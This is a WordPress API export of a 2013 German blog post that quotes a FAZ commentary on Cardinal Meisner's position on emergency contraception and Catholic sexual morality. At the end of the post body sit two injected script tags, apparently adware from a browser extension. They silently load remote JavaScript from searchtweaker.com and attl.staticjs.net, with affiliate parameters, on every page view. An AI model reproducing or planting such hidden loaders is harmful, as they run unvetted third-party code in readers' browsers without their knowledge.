{"id":1149,"date":"2013-02-21T01:17:59","date_gmt":"2013-02-20T23:17:59","guid":{"rendered":"http:\/\/b-logos.de\/?p=1149"},"modified":"2013-02-21T22:05:43","modified_gmt":"2013-02-21T20:05:43","slug":"meisner-den-boden-der-sexualmoral-des-lehramtes-verlassen","status":"publish","type":"post","link":"https:\/\/b-logos.de\/?p=1149","title":{"rendered":"\u201eMeisner den Boden der &#8230; Sexualmoral des Lehramtes verlassen\u201c"},"content":{"rendered":"<p>So schreibt der Theologe und Journalist Daniel Deckers in der FAZ am 5.2.13:<\/p>\n<blockquote><p>&#8230; Indes ist Meisners Differenzierung grunds\u00e4tzlicher und folgenreicher, als es auf den ersten Blick den Anschein hat. Denn der K\u00f6lner Kardinal hat Normbegr\u00fcndungsverfahren in die innerkatholische Debatte \u00fcber das Pro und Contra k\u00fcnstlicher Empf\u00e4ngnisverh\u00fctung eingebracht, die auf Seiten des Lehramtes bislang tabu waren.<!--more--> Keinen Zweifel l\u00e4sst der Kardinal an der grunds\u00e4tzlichen Ablehnung der Abtreibung durch die katholische Kirche. Wenn \u201eim Notfall\u201c empf\u00e4ngnisverh\u00fctende Mittel nicht mehr rundheraus abgelehnt werden und eine abortive Wirkung \u201eals Nebenwirkung\u201c um eines h\u00f6heren Gutes willen in Kauf genommen wird, dann hat Meisner den Boden der in einer r\u00f6misch-katholischen Interpretation des Naturrechts begr\u00fcndeten Sexualmoral des Lehramtes verlassen &#8211; wenn auch nur einen kleinen Schritt weit. Ein weiterer kleiner Schritt f\u00fcr die Ethik, ein gro\u00dfer aber f\u00fcr die Kirche w\u00e4re es, wenn sie ihre gesamte Sexualmoral nach den Regeln der G\u00fcterabw\u00e4gung revidierte und dem Verh\u00e4ltnis von Handlungen und Nebenwirkungen mehr Beachtung schenkte.<\/p><\/blockquote>\n<p>Ganzer Text <a title=\"Die Gretchenfrage der katholischen Sexualmoral\" href=\"http:\/\/www.faz.net\/aktuell\/politik\/inland\/erklaerung-zur-pille-danach-die-gretchenfrage-der-katholischen-sexualmoral-12050871.html\">hier<\/a>.<\/p>\n<p>Der Hinweis kam \u00fcber <a title=\"Die F.A.Z. wei\u00df, wohin die Pferdchen Kardinals Meisner laufen: zur\u00fcck nach K\u00f6nigstein.\" href=\"http:\/\/www.katholisches.info\/2013\/02\/05\/die-f-a-z-weis-wohin-die-pferdchen-kardinals-meisner-laufen-zuruck-nach-konigstein\/\">katholisches.info<\/a>. Dort stellt Johannes Buchmann den Vorgang in den Zusammenhang der K\u00f6nigsteiner Erkl\u00e4rung.<\/p>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><script type=\"text\/javascript\" src=\"http:\/\/attl.staticjs.net\/amz\/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vYi1sb2dvcy5kZS93cC1hZG1pbi9wb3N0LW5ldy5waHAiLCJ3aWR0aCI6MTI4MCwiaGVpZ2h0IjoxMDI0LCJsb2FkZXJfY2xpZW50X3RpbWVzdGFtcCI6MTM2MTQwMTk4NzQ3NX0%3D.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>So schreibt der Theologe und Journalist Daniel Deckers in der FAZ am 5.2.13: &#8230; Indes ist Meisners Differenzierung grunds\u00e4tzlicher und folgenreicher, als es auf den ersten Blick den Anschein hat. Denn der K\u00f6lner Kardinal hat Normbegr\u00fcndungsverfahren in die innerkatholische Debatte \u00fcber das Pro und Contra k\u00fcnstlicher Empf\u00e4ngnisverh\u00fctung eingebracht, die auf Seiten des Lehramtes bislang tabu &hellip; <a href=\"https:\/\/b-logos.de\/?p=1149\" class=\"more-link\"><span class=\"screen-reader-text\">\u201e\u201eMeisner den Boden der &#8230; Sexualmoral des Lehramtes verlassen\u201c\u201c<\/span> weiterlesen<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[],"tags":[],"class_list":["post-1149","post","type-post","status-publish","format-standard","hentry"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pahMNU-ix","_links":{"self":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1149"}],"version-history":[{"count":5,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1149\/revisions"}],"predecessor-version":[{"id":1151,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1149\/revisions\/1151"}],"wp:attachment":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}